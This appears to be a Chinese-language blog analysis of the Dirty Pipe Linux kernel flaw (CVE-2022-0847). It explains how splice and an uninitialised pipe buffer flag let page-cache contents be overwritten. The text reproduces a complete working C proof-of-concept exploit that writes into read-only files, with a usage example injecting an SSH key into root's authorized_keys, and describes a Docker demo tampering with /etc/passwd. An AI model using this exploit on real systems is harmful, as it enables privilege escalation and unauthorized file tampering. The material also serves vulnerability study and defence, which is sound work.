splice()
函数可以通过"零拷贝"的形式将文件发送到pipe
,代码层面的零拷贝是直接将文件缓存页(page cache)作为pipe
的buf
页使用。但这里引入了一个变量未初始化漏洞,导致文件缓存页会在后续pipe
通道中被当成普通pipe
缓存页而被"续写"进而被篡改。然而,在这种情况下,内核并不会将这个缓存页判定为"脏页",短时间内(到下次重启之类的)不会刷新到磁盘。在这段时间内所有访问该文件的场景都将使用被篡改的文件缓存页,也就达成了一个"短时间内对任意可读文件任意写"的操作。网上已经有对该漏洞的详细分析,本文不在详细介绍其原理,只做一些简单介绍,具体的关于漏洞的发现细节以及原理可参考文末链接的几篇文章:pipe/pipe2
函数创建,返回两个文件描述符,一个用于发送数据,另一个用于接受数据,类似管道的两段 。管道实现的源代码在fs/pipe.c中,在pipe.c中有很多函数,其中有两个函数比较重要,管道读函数pipe_read()和管道写函数pipe_wrtie() ,这里简要介绍以下pipe_write()。......if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
/*关键,如果PIPE_BUF_FLAG_CAN_MERGE 标志位存在,代表该页允许接着写 *如果写入长度不会跨页,则接着写,否则直接另起一页 */
ret = pipe_buf_confirm(pipe, buf);
···
ret = copy_page_from_iter(buf->page, offset, chars, from);
···
}
buf->len += ret;
···
}
}...
PIPE_BUF_FLAG_CAN_MERGE
flag
标记,如果不存在则不允许在当前页面续写, buf->flag
默认初始化为PIPE_BUF_FLAG_CAN_MERGE
,因为默认状态是允许页可以续写的 。Splice()
页面缓存(Page Cache)
中, 后续再把它从内核区域复制到用户程序的内存空间中;splice()
系统调用, 它的任务是从文件中获取数据并写入管道中, 期间一个特殊的实现方式便是: 目标文件的页面缓存数据不会直接复制到Pipe的环形缓冲区内, 而是以索引的方式(即 内存页框地址、偏移量、长度 所表示的一块内存区域)复制到了pipe_buffer的结构体中, 如此就避免了从内核空间向用户空间的数据拷贝过程, 所以被称为”零拷贝”。/* SPDX-License-Identifier: GPL-2.0 *//* * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <[email protected]> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */#define _GNU_SOURCE#include <unistd.h>#include <fcntl.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/stat.h>#include <sys/user.h>#ifndef PAGE_SIZE#define PAGE_SIZE 4096#endif/** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */static void prepare_pipe(int p[2]){
if (pipe(p)) abort();const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];/* fill the pipe completely; each pipe_buffer will now have the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}/* drain the pipe, freeing all pipe_buffer instances (but leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}/* the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its "flags", the buffer will be mergeable */}int main(int argc, char **argv){
if (argc != 4) {
fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
return EXIT_FAILURE;
}/* dumb command-line argument parser */
const char *const path = argv[1];
loff_t offset = strtoul(argv[2], NULL, 0);
const char *const data = argv[3];
const size_t data_size = strlen(data);if (offset % PAGE_SIZE == 0) {
fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
return EXIT_FAILURE;
}const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
const loff_t end_offset = offset + (loff_t)data_size;
if (end_offset > next_page) {
fprintf(stderr, "Sorry, cannot write across a page boundary\n");
return EXIT_FAILURE;
}/* open the input file and validate the specified offset */
const int fd = open(path, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return EXIT_FAILURE;
}struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return EXIT_FAILURE;
}if (offset > st.st_size) {
fprintf(stderr, "Offset is not inside the file\n");
return EXIT_FAILURE;
}if (end_offset > st.st_size) {
fprintf(stderr, "Sorry, cannot enlarge the file\n");
return EXIT_FAILURE;
}/* create the pipe with all flags initialized with PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);/* splice one byte from before the specified offset into the pipe; this will add a reference to the page cache, but since copy_page_to_iter_pipe() does not initialize the "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return EXIT_FAILURE;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return EXIT_FAILURE;
}/* the following write will not create a new pipe_buffer, but will instead write into the page cache, because of the PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, data_size);
if (nbytes < 0) {
perror("write failed");
return EXIT_FAILURE;
}
if ((size_t)nbytes < data_size) {
fprintf(stderr, "short write\n");
return EXIT_FAILURE;
}printf("It worked!\n");
return EXIT_SUCCESS;}
Dockerfile
构建一个镜像,该镜像创建了一个非特权用户foo,并将exp复制到镜像中。FROM debian:stable-slimRUN adduser foo
USER foo
COPY exp /exp
/etc/passwd
尝试进行修改,默认情况下,该文件是只读的,且只有root用户有权限进行更改。passwd
文件也已经被更改,证明该镜像已经被持续的更改。但该更改并不是永久性的,短时间内的新建容器会出现这种情况。好文推荐